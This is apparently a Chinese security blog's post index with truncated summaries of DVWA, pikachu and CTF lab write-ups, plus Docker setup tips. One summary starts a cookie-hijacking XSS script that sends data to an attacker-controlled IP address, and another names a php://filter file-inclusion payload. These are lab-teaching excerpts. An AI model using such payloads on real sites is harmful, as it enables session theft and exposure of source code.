1jzz

2021年1月28日

摘要：难度1-Low 查看代码： <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_n 阅读全文

posted @ 2021-01-28 22:25 1jzz 阅读(82) 评论(0) 推荐(0) 编辑

DVWA-XSS(Stored)

摘要：难度1-Low 查看代码： <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); 阅读全文

posted @ 2021-01-28 15:41 1jzz 阅读(81) 评论(0) 推荐(0) 编辑

Cookie劫持之DVWA（XSS-low）

摘要： 1、利用环境配置首先在kali中开启apacha服务 sudo service apache2 start 然后在网站目录/var/www/html 下创建一个恶意js脚本 var image=new Image();image.src="http://192.168.31.155:8888/co 阅读全文

posted @ 2021-01-28 15:19 1jzz 阅读(240) 评论(0) 推荐(0) 编辑

DVWA-XSS(Reflected-反射型)

摘要：难度1-Low 查看代码： <?php // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '<pre>He 阅读全文

posted @ 2021-01-28 13:27 1jzz 阅读(70) 评论(0) 推荐(0) 编辑

2021年1月26日

pikachu-XSS(Cross-Site-Scripting)

摘要： XSS（跨站脚本）概述 Cross-Site Scripting 简称为“CSS”，为避免与前端叠成样式表的缩写"CSS"冲突，故又称XSS。一般XSS可以分为如下几种常见类型： 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS; XSS漏洞一直被评估为web漏洞中危害较大的漏洞，在OWA 阅读全文

posted @ 2021-01-26 00:22 1jzz 阅读(109) 评论(0) 推荐(0) 编辑

pikachu-暴力破解

摘要： 1、验证码绕过（on-server）先看看提示，提示说验证码好像一直有效，那么这个验证码可能只需要验证一次之后可以重复利用查看一下后端代码： if(isset($_POST['submit'])) { if (empty($_POST['username'])) { $html .= "<p c 阅读全文

posted @ 2021-01-26 00:05 1jzz 阅读(121) 评论(0) 推荐(0) 编辑

2021年1月25日

Docker更换国内镜像源

摘要： 1、修改/etc/docker/daemon.json配置文件 sudo vim /etc/docker/daemon.json 2、修改daemon.json文件的内容 { "registry-mirrors": ["https://docker.mirrors.ustc.edu.cn"] } s 阅读全文

posted @ 2021-01-25 23:05 1jzz 阅读(5607) 评论(0) 推荐(0) 编辑

Unsupported config option for services service: 'web' 问题解决

摘要：之前在用docker搭建靶场的时候出现了这个报错： Unsupported config option for services service: 'web' 后来究其原因是和需要搭建环境的docker-compose.yml配置文件中的版本和实际上安装的版本的区别导致这个问题。比如我当初报错的阅读全文

posted @ 2021-01-25 22:53 1jzz 阅读(4754) 评论(0) 推荐(0) 编辑

2021年1月24日

[BSidesCF 2020]Had a bad day

摘要：点下面的按钮会出现这个参数，可能是sql注入加个'试试发现直接报错了，并且出现了includi的关键词那么可能是文件包含，先用php://filter/read=convert.base64-encode/resource=index.php 读取index.php的页面代码看看，发现读取不成阅读全文

posted @ 2021-01-24 22:02 1jzz 阅读(347) 评论(0) 推荐(0) 编辑

[WesternCTF2018]shrine

摘要： import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read 阅读全文

posted @ 2021-01-24 21:55 1jzz 阅读(165) 评论(0) 推荐(0) 编辑

公告